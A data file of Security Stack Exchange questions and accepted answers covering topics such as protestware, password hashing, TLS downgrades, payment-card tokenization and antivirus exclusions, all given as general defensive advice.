Columns: source_id (int64, 1 – 4.64M) · question (string, lengths 0 – 28.4k) · response (string, lengths 0 – 28.8k) · metadata (dict)
260,722
Since the beginning of the Russia-Ukraine war, a new kind of software has appeared, called "protestware". In the best case, the devs only add some (personal) statements about the war, or uncensored information, to the repositories or when starting the application. Since GitHub and other platforms are not banned in Russia, this could help reach users and provide them with news. The Open Source Initiative wrote in a blog post that it's ok to add a personal statement or some commit messages with information about the war to reach users with uncensored information. But there are also projects which add malicious behavior. One example is the "node-ipc" package, which deletes files depending on the geolocation. The affected versions also have their own CVE (CVE-2022-23812), which was rated with a CVSS of 9.8. From a security perspective, it's best practice to install the latest version, which should fix security issues but not introduce new ones as a "feature". But the node-ipc module showed that any maintainer/developer can add bad behavior to the software as a political statement. Question: New software versions can be used as a political statement. As a user, should I be concerned about political messages in software? What should I do to mitigate malicious behavior? I can't review the code of all the libraries and applications I use, and a lot of users do not have the knowledge to understand the code.
Political statements in software can be a concern for a few reasons: They may result in the software being banned in your country, so you should plan for that eventuality. They may result in the software being targeted (for example, the Notepad++ GitHub has been repeatedly spammed by Chinese accounts over its various version names), and this may turn into more dangerous attacks which could compromise the software. It may indicate that the author is more likely to make actual changes to the software down the line. It suggests that the software is probably developed by an individual, which can make it more fragile and susceptible to various issues. But if the software actively does something malicious, then it's not "protestware". It's just malware. So you should treat it the same as if the software decided to bundle a password stealer/cryptominer/ransomware/etc. - using your existing supply chain and dependency management processes. The author(s) should also be blacklisted in your internal processes so that you don't use anything they have written (or anything that depends on them) again. It's also worth noting that this isn't really anything to do with "open source". Adding political messages to software is just as easy with closed source projects, and adding malicious code is much easier, because it's harder to detect. Because of this, a lot of organisations are advising against using software from unfriendly countries (such as the FCC recently stating that Kaspersky is considered an "unacceptable risk to national security").
{ "source": [ "https://security.stackexchange.com/questions/260722", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248862/" ] }
260,958
I am trying to better understand and determine the impact and implications of a web app where data tampering is possible. When discussing data tampering, I am referring to being able to use a tool such as Burp Suite or Tamper Data to intercept a request, modify the data, and submit it successfully. I understand that this will allow an attacker to evade client-side validations. For example, if the client does not allow certain symbols, e.g. (!#[]) etc., an attacker can input acceptable details which the client will validate, and then intercept the request and modify the data to include those symbols. But I'm thinking there is more than just the evasion of client-side validation that this vulnerability allows. I am also thinking it perhaps opens the door to dictionary attacks using Burp Suite, or brute-force logins to user accounts, since data can be intercepted and modified, which can be used to test username and password combinations. Would appreciate any insight regarding the implications of a data tampering vulnerability.
This "Data Tamper Vulnerability" is not a vulnerability. It's like "Door without lock vulnerability." Client-side validation is not validation. Is a convenience tool: better let the user know instantly that he cannot have # as username then waiting for the form to be submitted, the server reject the username and send back an error message stating that the username was not accepted AND he has to fill out the entire form again. If your threat model does not include "user submitting data without validation," you are doing it wrong. When an attacker sees your javascript stripping # from a field, one of the first things he will try is to send # on a field, and your server must deal with it. Do proper validation on the server. Never trust any data from the client: form fields, URL, GET parameters, cookies, JWT, filenames, everything coming from the client is untrusted until validated on the server . If the client is sending malicious input and the server is not validating, several bad things can happen: SQL Injection Remote Code Execution Cross Site Scripting Server side request forgery Remote file inclusion ... to name a few.
{ "source": [ "https://security.stackexchange.com/questions/260958", "https://security.stackexchange.com", "https://security.stackexchange.com/users/274318/" ] }
261,032
Is it possible to prove mathematically that a server is immune to denial-of-service attacks? Or is there some result in a computer science journal showing that this is an impossible task?
You cannot be immune to resource exhaustion. It's fundamentally not possible. Every server or cluster of servers has a maximum workload it can handle. If an attacker is capable of exceeding that, then you will not have enough capacity to serve your intended customers, and thus you have a denial-of-service attack. For the sake of clarity, "resource exhaustion" is one form of denial of service, but there are several more. For example, I could abuse a vulnerability in your code to crash your server repeatedly, lock all customer accounts, use shaped charges to breach the walls of the datacenter and then go wild on your servers with a shotgun, etc. All of these would result in "denial of service" in one form or another, but their mitigations are very different. My point is that you cannot mathematically prove to be immune from resource exhaustion, because no one can be immune. Nor can you prove immunity from someone physically destroying your servers, etc. Provable security is possible - to a degree. "Provable security" refers to some form of mathematical proof that a certain product will do what it claims to do. The seL4 microkernel, for example, has proofs that some functions do what they claim to do (although that doesn't mean the hardware used to run it is free of vulnerabilities). However, trying to prove that a microkernel does something and trying to prove that an application does something are two vastly different tasks, because an application depends on so many layers below it that it becomes functionally impossible.
{ "source": [ "https://security.stackexchange.com/questions/261032", "https://security.stackexchange.com", "https://security.stackexchange.com/users/276681/" ] }
261,064
If the password is hashed and then sent to the server where the hash is compared to the stored hash, this basically means that if someone had that hash they could still log in by sending the hash in the request; the password is just useless at this point. I am talking with respect to Bitwarden. How does hashing a password make it more "secure"?
"If the password is hashed [locally] and then sent to the server where the hash is compared to the stored hash ... I am talking with respect to Bitwarden" This is not how it is done. From the Bitwarden help: "Bitwarden salts and hashes your master password with your email address locally, before transmission to our servers. Once a Bitwarden server receives the hashed password, it is salted again with a cryptographically secure random value, hashed again, and stored in our database." So basically the locally hashed password is treated as the server-visible secret, and this is properly protected with server-side hashing. The point of local hashing is that the password that the user can remember is never transmitted, i.e. it is an additional security measure. While it is true that the resulting hash would be usable by an attacker instead of the original password, it is much harder to guess the long and essentially random hash than the much weaker password. And brute-forcing the original user password is also made harder by a deliberately slow hash function. What Bitwarden does here to harden a weak password is also known as key stretching.
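As an illustration of that two-stage scheme - NOT Bitwarden's actual code, and the algorithm choice and iteration counts below are assumptions made purely for the sketch:

```python
# Sketch: slow, salted client-side hash, then an independent server-side hash of that value.
import hashlib
import os

def client_side_hash(master_password: str, email: str) -> bytes:
    # Key stretching on the client; the email acts as the salt, so the memorable
    # master password itself never leaves the device.
    return hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                               email.lower().encode(), 600_000)

def server_side_record(client_hash: bytes) -> tuple[bytes, bytes]:
    # The server treats the client hash as the secret, salts it with its own
    # random value, and hashes it again before storing it.
    salt = os.urandom(16)
    stored = hashlib.pbkdf2_hmac("sha256", client_hash, salt, 100_000)
    return salt, stored

auth_token = client_side_hash("correct horse battery staple", "user@example.com")
salt, stored = server_side_record(auth_token)
print(salt.hex(), stored.hex())
```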
{ "source": [ "https://security.stackexchange.com/questions/261064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252088/" ] }
261,088
I'm curious what is the most widespread way nowadays to sign a telemetry message from a software program to prove its authenticity to the receiver. Imagine the software (which can run on-premise, on a customer's PC) creates a telemetry record. With the customer's consent this record is sent to the vendor server. The customer is aware of the message content (due to legal reasons) and knows to which API it is sent (because everybody can use traffic sniffers). How can the vendor be sure that the telemetry message is genuine, originating from their software? The goal is to reduce the risk of malicious manipulation of the telemetry message. The first thing that comes to mind is to embed a secret key in the software and use it to sign the telemetry message. The receiver checks the signature using the corresponding key and discards the message if the signature is not valid. To achieve that, the software assembly line must provide a fresh signing key at least for each release of the software, so the signing key remains fresh. The apparent risk is leakage of the signing key. Since it will be embedded in every copy of the software, and the software is shipped to the customer, there is no guarantee that it stays secret. The risk of key leakage can be reduced by a short key validity time, but it cannot be shorter than the valid usage time of the software version itself (1-2 years). So the risk of key leakage remains. Is this a working approach? Are there any other disadvantages of the suggested scheme which I don't see at first glance?
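For illustration only, a minimal sketch of the scheme described in the question, using an HMAC with a per-release key baked into the client build; the key, field names, and message format are hypothetical, and, as the question itself notes, anyone who extracts the embedded key from a shipped copy can forge "genuine" telemetry, so this only raises the bar.

```python
# Hypothetical per-release HMAC signing of telemetry records (sketch, not a recommendation).
import hashlib
import hmac
import json

EMBEDDED_RELEASE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # per release

def sign_telemetry(record: dict) -> dict:
    payload = json.dumps(record, sort_keys=True)
    tag = hmac.new(EMBEDDED_RELEASE_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "signature": tag}

def verify_telemetry(message: dict, key: bytes) -> bool:
    expected = hmac.new(key, message["payload"].encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, message["signature"])

msg = sign_telemetry({"version": "1.2.3", "event": "startup"})
print(verify_telemetry(msg, EMBEDDED_RELEASE_KEY))  # True
```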
{ "source": [ "https://security.stackexchange.com/questions/261088", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163171/" ] }
261,119
I am implementing a system where I need to store passwords in a database (hashed and all). My issue is that the business side requires me not to enforce any constraint on them except length (8 characters minimum), but to highly advise using special characters, uppercase characters, or not using your first name. Not following this advice would have liability implications on our side. For example, we would allow a client to use 12345678 as a password, but would not be liable if it gets brute forced. This would require me to have an integer in my database that remembers this for the original password (pre-hashing). Any big no-no in doing this? EDIT: Just to clarify, the integer would most likely be a flag that represents the type of weakness, i.e. too simple, commonly known weak password, uses personal information, etc. EDIT 2: The current solution, based on the multiple answers and comments below, would be to store an integer with flags that have been bit-shifted. This integer would be stored in a separate database and encrypted using public-key cryptography, most likely using ECC. EDIT 3: This is only viable assuming basic security at lower levels (OS and network) as well as spam prevention. The system would block further attempts for some time after multiple failed attempts, and passwords are securely hashed using both an (at least) 128-bit salt and a time/memory-consuming algorithm (Argon2id in this case). Final Edit: I have set @steffen-ullrich's response as accepted. Lots of very good answers, and I appreciate all the reasons why I shouldn't do this, but I wanted answers on what could go wrong and how one would go about doing it this way (many responses helped form the last edit). The legal aspect was provided to focus on the technical standpoint in light of a requirement I have no control over. My second edit basically describes what implementation would be a zero-compromise way of doing this. Disclaimer: this is pure curiosity and I have no plans to actually deploy this in production for the time being; I would recommend reading comments and chat threads before attempting this, as they describe many of the problems and limitations of an approach like this.
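A minimal sketch of the bit-shifted flag encoding described in EDIT 2; the specific flags and checks are illustrative only, and (as the accepted answer below explains) storing this next to the hash helps an attacker triage the weak passwords.

```python
# Illustrative weakness flags encoded as bits in a single integer (sketch only).
TOO_SIMPLE      = 1 << 0   # e.g. only digits or only lowercase letters
COMMON_PASSWORD = 1 << 1   # appears in a known-weak-password list
PERSONAL_INFO   = 1 << 2   # contains e.g. the user's first name

def weakness_flags(password: str, first_name: str, common: set[str]) -> int:
    flags = 0
    if password.isdigit() or password.islower():
        flags |= TOO_SIMPLE
    if password.lower() in common:
        flags |= COMMON_PASSWORD
    if first_name and first_name.lower() in password.lower():
        flags |= PERSONAL_INFO
    return flags

flags = weakness_flags("12345678", "Alice", {"12345678", "password"})
print(bin(flags))                     # 0b11
print(bool(flags & COMMON_PASSWORD))  # True
```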
Password hashing (with salting and slowness) is designed so that, given just the hash, you cannot tell whether the underlying password is weak or strong. Adding an additional indicator about the quality of the password allows an attacker to focus on the weak passwords first and therefore significantly decreases the cost of an attack.
{ "source": [ "https://security.stackexchange.com/questions/261119", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249756/" ] }
261,310
I own a small coffee shop in a highly-populated area. We've noticed that several computers are connecting to our WiFi network using spoofed MAC addresses (e.g. 11:22:33:44:55:66). Is there any way of identifying these machines? Is there any way to determine who these users are? I've been manually blocking these MAC addresses but they just create new addresses. Why do we block them? Because we've been notified by our ISP that these devices are using our WiFi to perform nmap scans. They aren't just "browsing", they're using our account to find open ports on machines all over the net.
Detecting and blocking spoofed MAC addresses is a losing game. As Toni pointed out, the attackers could just start copying MAC addresses of real devices, so you would have no practical way to stop them. In fact, it would just lead to denial of service for some of your legitimate customers. Instead, you could configure a firewall on the router to block outgoing connections to all ports except port 53 (DNS), 80 (HTTP), and 443 (HTTPS)*. This way, most of your regular customers will be able to continue browsing normally, and your wifi will be useless for people attempting nmap scans. *You might also want to allow common VPN ports, since a lot of people tend to use a VPN on public WiFis. Of course, this means people will be able to conduct nmap scans from your WiFi over VPN, but in that case, it should be the VPN provider's headache.
{ "source": [ "https://security.stackexchange.com/questions/261310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277103/" ] }
261,324
Suppose a hacker creates a Windows application that looks and feels like a legitimate web browser. The user believes they are using, say, Google Chrome. If you simply watched the bits going to and from the computer over the network, it would look like the user was in fact using a legitimate browser like Google Chrome. However, on the client side, this fake browser records all keystrokes entered by the user and, from that data, deduces the user's website/password-manager passwords. In the background, this data is continuously transmitted to the hacker. Alternatively, this fake browser could act like a legitimate browser for all URLs entered by the user except for some specific exceptions. Perhaps for a banking URL like chase.com, the browser does a phony DNS resolution and serves up content from a different site owned by the hacker, fooling the user into entering login credentials or other sensitive info. Are attacks like these possible? If not, what mechanisms are in place to thwart such attempts? I tried googling for phrases like "fake browser hack" but have not found anything that seems to resemble this.
Are attacks like these possible? Yes. A hacker just needs to download the Firefox source code, modify it, recompile it, and distribute it. If not, what mechanisms are in place to thwart such attempts? A user could download browsers from their official sites, not third-party sites. They could also use the package managers or app stores that are associated with many operating systems.
{ "source": [ "https://security.stackexchange.com/questions/261324", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277119/" ] }
261,720
Looking to create a form where developers can submit requests for packages to be installed. We want to create a list of questions that can help us determine whether or not a package is safe. What are some important questions to include in the form for our developers? My list so far: Package type: npm, PyPI, etc. Package name: Package version: Package release date: Explain the use case of the package: Provide the package documentation: Commit history? Actively maintained and updated? How many people can make commit changes? Are changes automatically approved or are they reviewed? Are there open bug reports? How many? How long have they been open? Any active or previous vulnerabilities listed in the NVD? https://nvd.nist.gov/vuln/search?results_type=overview&query=Cloudinary&search_type=all&form_type=Basic&isCpeNameSearch=false What dependencies does this package require?
I highly doubt that a process to request approvals for new third-party packages will have the desired effects. I've worked for organizations that have tried to introduce similar processes, and they tend to fail. The approval process rarely fits into the speed and cadence of development, leading to problems like teams not being able to execute on their planned work, or bypassing the review process entirely and dropping key aspects of third-party package review and selection. Especially in agile organizations, when the need or possibility of pulling in a third-party package as a solution arises, the team usually doesn't have a lot of time to make a decision. The work is already in progress and they need a rapid decision to move forward with designing, building, and integrating a solution. The first step is to give the team the knowledge needed to select appropriate packages, considering things like license terms and the overall health of the different options. The health of the package may consider any number of factors, but some that I've seen are things like how responsive the developer is to questions/issues in official support channels, how active the user community is (including third-party channels like Stack Overflow or various forums), the number of open issues and/or time to resolve defects, the number of open pull requests, the age of pull requests, the number of committers and who the committers are, frequency of commits, frequency of releases, the number of times the package is a dependency, the number of downloads (per unit of time, in some cases), the number of dependencies, and documentation (readme, contributor documents, funding information). Unfortunately, no one but you can determine which factors are most important. A big factor is the risk associated with the system that you are developing, along with the risk tolerance of the developing organization as well as of the users and customers. Some contexts are very sensitive to risks, while others are very tolerant. Snyk and Synopsys have tools that track common open source components and make some health information public. Their ratings and criteria may not be totally appropriate for your organization, and you may need to add guidance on how to interpret their data or what to do when components are not in their databases, but this may give you a good starting point to make things easier for the teams looking to include open source components. Giving the developers doing the work the training and the tools needed to compare options and make informed decisions based on guidelines is important. Taking these tactical decisions away from the team will only slow down the development effort and leave the teams unempowered to make the best design decisions. Once a package is incorporated, there's also ongoing maintenance. The use of software composition analysis tools can scan your software, find dependencies, and monitor those dependencies. You can be alerted to things like new versions, new vulnerabilities, or packages that no longer appear to be maintained. When these alerts come through, the development team can triage them to apply patches (or other mitigations), defer patches to a later time (if the vulnerability is low risk or there are other mitigations already in place), or identify when it may be time to migrate away from one dependency to another solution. Depending on your threat model, you may also need to consider other ways to mitigate risks.
Even with the appropriate reviews, there are cases of developers yanking their packages from the Internet, purposefully injecting malicious code into new versions, or not adhering to standard versioning schemes and breaking dependent systems. Version pinning, standing up mirrors for your dependencies, or building your dependencies from source may mitigate further risks. For open source dependencies, you may also be able to scan the source with your internal vulnerability scanners to further mitigate the risk of malicious code.
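As a rough illustration of gathering a few of these health signals automatically, here is a sketch that queries the public PyPI JSON API (https://pypi.org/pypi/&lt;name&gt;/json); the fields pulled below are only a small subset of the factors discussed above, and the thresholds you apply to them are up to you.

```python
# Sketch: pull a few package "health" signals from the PyPI JSON API.
import json
import urllib.request

def pypi_summary(name: str) -> dict:
    with urllib.request.urlopen(f"https://pypi.org/pypi/{name}/json") as resp:
        data = json.load(resp)
    info = data["info"]
    return {
        "name": info["name"],
        "latest_version": info["version"],
        "license": info.get("license"),
        "release_count": len(data["releases"]),
        "project_urls": info.get("project_urls"),
    }

print(pypi_summary("requests"))
```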
{ "source": [ "https://security.stackexchange.com/questions/261720", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277711/" ] }
261,753
I am reading "Serious cryptography" and he wrote the following: Informational security is based not on how hard it is to break a cipher, but whether it’s conceivable to break it at all. A cipher is informationally secure only if, even given unlimited computation time and memory, it cannot be broken. Even if a successful attack on a cipher would take trillions of years, such a cipher is informationally insecure. Then, he proceeded to write that the one-time pad is informationally secure. I don't understand this at all. If we see a cyphertext, such as 00110 , we know that the corresponding plaintext has 5 bits as well, and the cypher key will also have 5 bits, thus 2^5*2^5=1024 possible combinations. Bruteforcing 1024 will yield a result. Even if the cyphertext is huge and bruteforcing won't be practical, it is still theoretical possible, no? If it is theoretical possible, wouldn't it deem the one-time pad as informationally insecure? What am I missing here?
Bruteforcing all 1024 possibilities will yield a result. Yes, a result. But even if you iterate all 32 possible 5-bit keys, you still have no idea which result is the "correct" one. That's what makes it informationally secure: even if you iterate every key (and thus every possible message), you don't know which of these messages is the one that was sent. For example, imagine the following message: ATTACK AT 8. It's 11 characters long, and you could conceivably iterate the space of all 11-character strings. This will yield results such as: PIZZA TIME! YOZNACKS :) ATTACK AT 3 ATTACK AT 8 IN UR BASE! Now you look at all these messages and you are still none the wiser. In fact, you don't even need the ciphertext at all. Knowing the length of the message, you can simply iterate the entire message space, and all you will know for sure is that one of these messages must be the correct one. To break it down even further, imagine your message is just a single bit, either 1 or 0. To encrypt it, you either decide to "flip" it or not (meaning, you XOR it with 1 or 0). This leaves us with the following 4 states: Message 0, Key 0 => Ciphertext 0; Message 0, Key 1 => Ciphertext 1; Message 1, Key 0 => Ciphertext 1; Message 1, Key 1 => Ciphertext 0. You then present the ciphertext to the attacker, while keeping the key secret. Say you present 1. According to the table, the message was either 0 with a key of 1, or 1 with a key of 0. But since the attacker does not know the key, they only have a 50% chance of guessing the correct bit - which is the best they can do in a perfect system. For every bit in the message, the chance of successfully guessing the whole message is halved. And again, you can only guess the message - there is no indication of whether your guess is correct or not.
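A small demonstration of this point, assuming a one-time pad implemented as byte-wise XOR: for a given ciphertext, every plaintext of the same length is reachable with some key, so the ciphertext alone tells the attacker nothing.

```python
# Sketch: any same-length plaintext is consistent with the ciphertext under some key.
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

message = b"ATTACK AT 8"
key = os.urandom(len(message))          # truly random, used only once
ciphertext = xor(message, key)

# The attacker, knowing only the ciphertext, can "decrypt" it to any candidate:
for candidate in (b"ATTACK AT 8", b"ATTACK AT 3", b"PIZZA TIME!"):
    implied_key = xor(ciphertext, candidate)
    assert xor(ciphertext, implied_key) == candidate
    print(candidate, "<- possible with key", implied_key.hex())
```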
{ "source": [ "https://security.stackexchange.com/questions/261753", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277751/" ] }
261,890
A user is trying to access a poorly maintained website using a modern OS (Windows 10) and web browser (Firefox 100.0). They want to download something from there, but they are seeing a security warning indicating that the host is using a deprecated TLS protocol version and/or has an issue with its certificate. The user has been in touch with the person who owns the domain and downloadable content, and this person is being slow to get it fixed. Questions: Can the user (re-)enable old TLS protocol versions for this site in Firefox (by setting security.tls.version.enable-deprecated to true) and safely browse & download content as long as they avoid entering data such as credit card numbers, passwords, etc.? Or does simply browsing a site using old TLS versions itself carry inherent risks? If the latter, is there a way for them to reasonably mitigate these risks? (By reasonable, I mean without configuring network/firewall settings, using a container, etc.) They are considering firing up an old Windows XP computer running an also-old Internet Explorer, which I'm open to letting them do, as long as they don't share their data on the network and take the device offline as soon as they are done. LMK if you can think of any reasons why this would be a bad idea. I looked for answers on Firefox forums, this forum, and via a general web search, but I didn't find anything useful.
Of course the site should upgrade its TLS setup. But, until the site owner does that, the user who needs to download the file from the site must look for a workaround. The user can proceed to download the file - either by using http instead of https if the site allows it, or by ignoring the browser's TLS / certificate warnings and proceeding anyway, or by using an older operating system from the same vintage as the site's TLS setup, or by using a command line tool such as curl or wget, or another method. But, as others have mentioned, a man in the middle (MITM) would be in a position to impersonate the site and serve the user a malicious file instead of the true and correct file. To mitigate this problem, the user would be well advised to verify the integrity of the file by taking a checksum hash of the file after downloading it and ensuring that it matches the known correct checksum for the file. Related: Are downloads from http connections safe? ubuntu sources.list urls are not HTTPS -- what risk does this present, if any?
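A minimal sketch of that integrity check; the file name and expected digest below are placeholders, and the correct checksum must be obtained over a channel you trust rather than over the same shaky TLS connection.

```python
# Sketch: verify a downloaded file against a known-good SHA-256 checksum.
import hashlib

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

expected = "d2a84f4b8b650937ec8f73cd8be2c74add5a911ba64df27458ed8229da804a26"  # placeholder
actual = sha256_of("downloaded-file.zip")                                     # placeholder
print("OK" if actual == expected else "MISMATCH - do not use the file")
```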
{ "source": [ "https://security.stackexchange.com/questions/261890", "https://security.stackexchange.com", "https://security.stackexchange.com/users/213485/" ] }
262,061
Suppose we have a site that has public and private areas. The private areas require login. For example, "www.site.com/about" is publicly accessible, but "www.site.com/message_inbox" requires authorization (a valid login). So what happens when someone who is not logged in tries to access a private area like "www.site.com/message_inbox"? It would be terribly confusing for legitimate users to receive a 404 error (e.g. imagine refreshing the page after your session expires and seeing a 404). Therefore, it is convenient for legitimate users if we redirect to a login page. However, then an attacker could determine whether "www.site.com/some_page" is a legitimate private URL by seeing if it returns a 404 error or a login page. Maybe we don't want outsiders to be able to compile a list of valid URLs. We could attempt to mask this by redirecting ALL requests to the login page, except for the public pages. But this becomes silly as all junk requests will happily return HTML. What is the correct solution to this?
What is your threat model? With a blanket approach you won't solve your use case. Correct, if you do as you describe you allow an attacker to enumerate your valid pages, theoretically. Does he have an advantage doing so? Do you have a possible attack vector that requires him to have knowledge of valid pages? Would your app leak information through such an enumeration? These are the questions to ask. Once you have the answers, you can calculate the trade-off between user-friendliness and security. Maybe we don't want outsiders to be able to compile a list of valid URLs. The question "why?" is asked not often enough in InfoSec. We have a bunch of "best practices", most of which are really based on "everyone I asked thinks that's a good idea". Take the password complexity disaster where we've told users for decades something that's simply wrong. And it'll take us at least another decade to get all those silly complexity rules encoded into software and security policies out of the system. Never stop with "maybe we don't want". Ask what the actual threat behind it is that you are trying to prevent.
{ "source": [ "https://security.stackexchange.com/questions/262061", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277680/" ] }
262,112
A company are saying they sent an email to me. I have gone through all of my inbox, junk, and deleted files and the email still doesn’t exist. They have asked me to prove the email never got to me by asking my email provider to send over log details but I have looked into this and it is impossible. Is there any other way to prove an email wasn’t sent to me? Also I have asked them to resend the email but they are saying because the email was automatically generated from an email sent to them they don’t have a copy of the sent email.
This is like one of those situations where Amazon asks someone to send a picture proving that a package was never delivered. You can't. In general, you cannot "prove a negative". Trying to get your email provider to supply logs will be difficult and might take a long time. And they might not do it. What will be a lot easier and faster is for the company to check their own email logs for proof that they sent the email. They don't need a copy, just a log entry.
{ "source": [ "https://security.stackexchange.com/questions/262112", "https://security.stackexchange.com", "https://security.stackexchange.com/users/278342/" ] }
262,274
I need to validate and store credit card information (name, card number, expiration date, CVC) for retrieval at a later date. Once retrieved, the data will be used for manual processing on a separate system. I have been told countless times that storing credit card data in a MySQL database is a terrible idea, even if encrypted in PCI compliant secure servers. What service in 2022 can I use that has something like an API, and with which I can securely store and retrieve credit card info? Validating it before storing it would be awesome, but I can do that in an extra step if necessary.
"What service in 2022 can I use that has like an API in which I can securely store credit card info and retrieve it at a later date for manual processing?" Pick a credit card processor, any credit card processor... They will have a service named "Tokenization" where: you give them the credit card details; they give you a "token" back; all future use of that card is done by sending them the token. The advantage of this is that all the work of properly encrypting the card info falls upon them; all you have to do is store those tokens and use them in lieu of the card details. If you decide you want all those numbers back, you can request detokenization, for some reasonable fee. But it's better just to leverage the tokens; detokenization is usually triggered by a merchant switching to a different processor.
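For illustration, a rough sketch of that tokenization flow against a hypothetical processor API - the endpoint, field names, and authentication shown here are made up, and in practice you would use the processor's own SDK or hosted fields rather than handling raw card data yourself.

```python
# Sketch of a tokenize-then-charge flow against a made-up processor endpoint.
import json
import urllib.request

PROCESSOR_URL = "https://api.example-processor.test/v1/tokens"   # hypothetical
API_KEY = "sk_test_placeholder"                                   # hypothetical

def tokenize_card(card: dict) -> str:
    req = urllib.request.Request(
        PROCESSOR_URL,
        data=json.dumps(card).encode(),
        headers={"Authorization": f"Bearer {API_KEY}",
                 "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["token"]          # store this token, never the card

def charge_with_token(token: str, amount_cents: int) -> None:
    # Later payments reference only the stored token, not the card details.
    ...

token = tokenize_card({"number": "4242424242424242", "exp": "12/26", "cvc": "123"})
```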
{ "source": [ "https://security.stackexchange.com/questions/262274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277795/" ] }
262,453
A technical problem has arisen, and the vendor's first suggested solution is to exclude the program's folders from our antivirus. There are multiple reasons I am hesitant to do so: Primarily: If a malicious file finds its way into those folders, either via vendor patching or unrelated actions, said file will be ignored by the antivirus whereas it may otherwise have been immediately neutralized. We currently only exclude specific files by their SHA256 hash. This program set, however, contains far too many files for this to be feasible. This can not be scalable. If we excluded every folder for every approved application, the threat surface would be colossal. And so forth. In this specific instance, it's something we can do for a specific set of machines to test. The situation did bring forth the general question, however I'm curious to know what the larger community thinks about when is it acceptable to exclude folders in antivirus , and why ? The short answer, I would argue, is "as little as possible" for the reasons I listed above and more, but I came to realize that I can't think of a single scenario where it would be a good idea. The functionality is common in antivirus applications, which suggests that there are legitimate reasons to do so, but I can't think of an instance where we would want to leave an entire folder free to become infected. I struggle to put this into precise words, but it feels like violating some analogue to the least-trust principle -- it'd be a lot smoother day-to-day to give all employees full admin access to everything, until it goes horribly wrong; similarly, it'd be really easy to just exclude folders from antivirus at the first sign of false positive, until that backfires when there really is something malicious in there. Are there examples I'm not thinking of where it really is the best solution, where this would be the advisable choice? Example scenarios and research are welcome.
Ah yes, ye olde problem of security tools making a system unusable. My arch nemesis. "when is it acceptable to exclude folders in antivirus, and why?" Short answer: There's an old adage on this site that "security at the expense of usability comes at the expense of security" - i.e. if your security controls make a system unusable, then people will find cheeky ways around your controls (like CTRL+ALT+DEL killing the anti-virus agent, or doing their work on a machine that does not have the AV installed), often resulting in bigger security holes than what you were trying to prevent in the first place. Not to mention that an entire company's worth of lost productivity due to fighting with sec tools can add up to be as expensive as the breach they're trying to prevent. Remember that the goal of infosec is to add value to the company's bottom line; if you hurt productivity too much then you're actually doing the opposite. Dialing back security tools so that people can actually get their jobs done is often necessary. Examine your options, do some trials with a few volunteers, and then re-engage the tool in a less disruptive way. Longer answer: "Primarily: If a malicious file finds its way into those folders, either via vendor patching or unrelated actions, said file will be ignored by the antivirus whereas it may otherwise have been immediately neutralized." And of course if it becomes known that this folder is excluded, then malicious files may intentionally find their way there! "We currently only exclude specific files by their SHA256 hash. This program set, however, contains far too many files for this to be feasible. This can not be scalable. If we excluded every folder for every approved application, the threat surface would be colossal." Some options to consider: If those application folders are super locked down (like read-only by local accounts, writable only by some domain super user account), and you AV those applications before deploying them, then maybe excluding the whole folders is reasonable. Many AVs now support code-signing-based allow lists. So for example at the time that you approve Firefox, you could add Mozilla's code signing cert to your allow list. This approach has drawbacks because not all vendors code-sign, and just because you trust one app from a given vendor, you may not want to trust everything they produce. Keep an in-house code-signing CA to sign files that you want the AV to ignore. That way the AV's allow list consists only of your in-house CA. This still has the drawback that you can only code-sign binaries, so if the AV is causing problems with config and data files then this won't help.
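As an illustration of the per-file hash approach mentioned in the question, a small sketch that walks an application folder and emits SHA-256 allow-list entries; the folder path and output format are assumptions, not any particular AV product's syntax.

```python
# Sketch: generate per-file SHA-256 entries for an application folder.
import hashlib
from pathlib import Path

def hash_tree(root: str) -> dict[str, str]:
    hashes = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            hashes[str(path)] = hashlib.sha256(path.read_bytes()).hexdigest()
    return hashes

# Hypothetical install location; adjust to the vendor's actual folder.
for path, digest in hash_tree(r"C:\Program Files\VendorApp").items():
    print(f"{digest}  {path}")
```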
{ "source": [ "https://security.stackexchange.com/questions/262453", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256638/" ] }
262,634
Sometimes I receive email messages from organisations I'm involved with saying something like: "Alice at AnyCo has sent you a secure message", along with a link to access said message. Sometimes I'm then asked to create an account. The last one even decided to use "2FA" and sent me a code to the same email address before I could log in. The companies which provide this service (for example Kiteworks) seem to act like it's the responsible way to send documents. My impression is that this amounts to "security theatre" and does nothing to prevent unauthorised access to the file by third parties, or tampering with the contents of the file, compared with simply sending an attachment. That is usually what is implied by these services.
It provides some benefits in that the sensitive contents are stored on the server, rather than in the body of the email. This means that the link can be revoked to block access (for example, if the email was sent to the incorrect address) - whereas once an email has been sent, there's no reliable way to recall it. It also allows the file sharing platform to implement some additional security controls (such as IP restrictions, or only allowing federated authentication) - so the link by itself might not have any value if an attacker can't reach or authenticate to the site. But in a lot of cases, it is just security theatre (especially if the "secure" platform doesn't enforce conditional access, MFA, risky login detection, and all the other security features that the email system does). It also trains users to click links in emails and then enter their credentials, which is obviously a very bad habit to get into. A lot of the time, these "secure" platforms are used for compliance reasons, rather than because they're addressing a realistic threat.
{ "source": [ "https://security.stackexchange.com/questions/262634", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34123/" ] }
263,429
